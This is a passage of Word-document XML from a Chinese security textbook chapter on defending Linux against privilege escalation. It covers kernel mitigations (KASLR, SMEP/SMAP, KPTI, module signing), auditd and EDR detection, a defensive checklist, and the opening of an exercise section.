        </w:rPr>
        <w:t xml:space="preserve">：尽管容器本身并不提供与虚拟机同等级别的隔离（容器共享宿主机内核），但结合</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> seccomp、AppArmor </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SELinux </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等强制访问控制（MAC）机制，可以限制容器内进程能够调用的系统调用种类。这意味着，即使攻击者控制了容器内部，也可能因为无法调用漏洞所在的特定系统调用而无法触发内核漏洞。这种“内核攻击面缩减”是容器安全加固的关键实践。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="279"/>
    <w:bookmarkStart w:id="280" w:name="内核加固与缓解机制"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">内核加固与缓解机制</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">现代</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Linux </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">内核已经引入了一系列与用户态缓解类似的安全机制，旨在提高内核漏洞利用的门槛：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">① </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">KASLR（Kernel</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Address Space Layout </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Randomization，内核地址空间布局随机化）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：与用户态的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ASLR </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">类似，KASLR</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在每次内核启动时将内核代码、数据、模块的基地址随机化，使攻击者难以预测内核符号的具体地址。这一机制的防护有效性建立在一个假设之上：攻击者无法通过信息泄漏获取内核布局。蓝队应确保</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> KASLR </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在内核启动参数中启用（检查</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/proc/cmdline</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">是否包含</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">kaslr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">② </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">SMEP/SMAP（Supervisor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Mode Execution Prevention / Supervisor Mode Access </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Prevention，管理模式执行/访问防护）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：这两个由</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Intel/AMD </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">处理器提供的硬件特性分别禁止内核态执行用户态映射的页面（SMEP）和访问用户态内存（SMAP）。在漏洞利用中，攻击者经常将</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> shellcode </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或恶意数据放在用户态，然后尝试诱导内核去执行或引用这些数据。SMEP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SMAP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">直接打破了这一假设。蓝队应确认系统</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CPU </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">支持这些特性且内核编译时已使能。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">③ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">KPTI（Kernel</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Page-Table </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Isolation，内核页表隔离）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：最初为防御</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Meltdown </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">类漏洞而引入，KPTI</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">将内核页表与用户态页表分离，限制了用户态代码可以间接观察到的内核映射。从提权防御角度看，KPTI</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">增加了攻击者从用户态探测内核数据结构的难度。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">④ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">内核模块签名与锁定</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：在启用了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> UEFI Secure Boot </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的系统上，内核可以限制只加载经过签名的内核模块，甚至可以在启动后完全禁止模块加载（通过设置</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">kernel.modules_disabled=1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）。这一措施可以阻止攻击者即使获得</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> root </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">权限后，悄然加载恶意内核模块（rootkit）来持久化。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">必须指出：上述缓解机制并非万能药。学术界与安全社区已多次展示这些机制可以被组合信息泄漏与高级利用技术绕过（相关概念性原理可参考</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Gruss </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等人关于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Meltdown </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的工作，以及</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Lipp </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等人关于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Rowhammer </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">内核利用的研究）。然而，缓解机制的意义并不在于“绝对安全”，而在于显著提高攻击成本，使得批量化的机会型攻击不可行，并为检测与响应争取时间窗口。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="280"/>
    <w:bookmarkStart w:id="281" w:name="监控异常提权与审计"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">监控异常提权与审计</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">蓝队的最后一道防线是“发现正在发生的攻击”。内核漏洞提权会留下可检测的痕迹，安全运营团队应围绕以下维度构建检测能力：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">① </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">审计日志（auditd）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：Linux</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">审计子系统可以记录系统调用序列、文件访问、权限变更等事件。关键的检测规则包括：普通用户进程执行了创建具有</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> root </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">权限子进程的操作、非预期的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">uid</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">gid</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">变更事件、对</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/dev/mem</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/dev/kmem</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的非法访问、以及内核模块加载事件。审计规则的部署应符合</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CIS Benchmarks </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中关于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Linux </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">审计的推荐。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">② EDR </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">行为告警</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：现代端点检测与响应（EDR,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Endpoint Detection and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Response）平台可以在进程树中识别反常的父子关系——例如一个低权限</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> shell </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">进程直接派生出</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> root </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">权限的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">bash，而没有经过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">su</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sshd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等合法的权限过渡程序。这种“前向推理”是检测提权行为的高效手段。需要强调的是，本书仅在检测视角下讨论</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> EDR </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的告警逻辑，不涉及攻击者如何规避</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> EDR </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的任何技术细节。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">③ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">内核崩溃签名监控</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：许多内核漏洞利用的失败尝试会导致内核出现</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Oops </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">panic（恐慌）、内核态段错误等异常，这些会被记录在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">dmesg</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/log/kern.log</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中。频繁的内核</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Oops </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或非计划的重启可能是攻击者在尝试利用漏洞的信号。蓝队可以通过集中式日志管理平台对内核错误消息建立告警规则。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">④ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">不可变基础设施与频繁重建</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：在云原生场景下，与其花费精力检测内核级的入侵，不如采用“不可变基础设施”策略——所有服务器在部署后不再接受修补或修改，一旦发现异常或需要升级，直接用新镜像替换整个实例。这种模式从根本上限制了攻击者的停留时间（dwell</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">time），使得即便内核被攻破，攻击者也难以在短时间内完成信息收集和持久化工作。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">防御对照框（强制收口）：本节涉及的防御措施形成以下统一清单，对应第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 15 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章所有提权路径的防护体系。补丁管理方面：建立以风险为导向的内核补丁流程，优先修补已公开</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PoC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的本地提权漏洞，考虑使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> livepatch </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">缩短暴露窗口，定期审计内核版本是否已到达生命周期终点。最小权限方面：移除所有不必要的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SUID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">二进制文件，使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">精细化权限替代直接赋予</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">root，将容器化服务的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> seccomp profile </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">限制在必需的最小系统调用集合内。内核加固方面：确保</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> KASLR、SMEP/SMAP、KPTI </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在受支持的硬件与内核版本上启用，设置</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">kernel.modules_disabled=1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">以阻止运行时的恶意模块加载，使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SELinux/AppArmor </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">将关键服务约束在其所需的最小权限域中。监控方面：部署</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> auditd </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">规则检测非预期的权限变更，在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> EDR/SIEM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中建立异常进程父子关系的关联规则，监控内核</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Oops </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和重启频率，并在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SIEM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中设定针对批量提权尝试的基线偏离告警。蓝队的整体策略不是追求“不可能被攻破”，而是确保任何攻击行为都能被迅速发现、隔离并追溯。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="281"/>
    <w:bookmarkEnd w:id="282"/>
    <w:bookmarkStart w:id="283" w:name="习题-16"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">习题</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">以下习题旨在检验读者对</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Linux </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">提权核心原理和防御体系的理解，要求提取关键概念而非复述工具用法。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">习题</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">15.2.1：SUID</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">提权原理的提取</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">请用不超过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 200 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
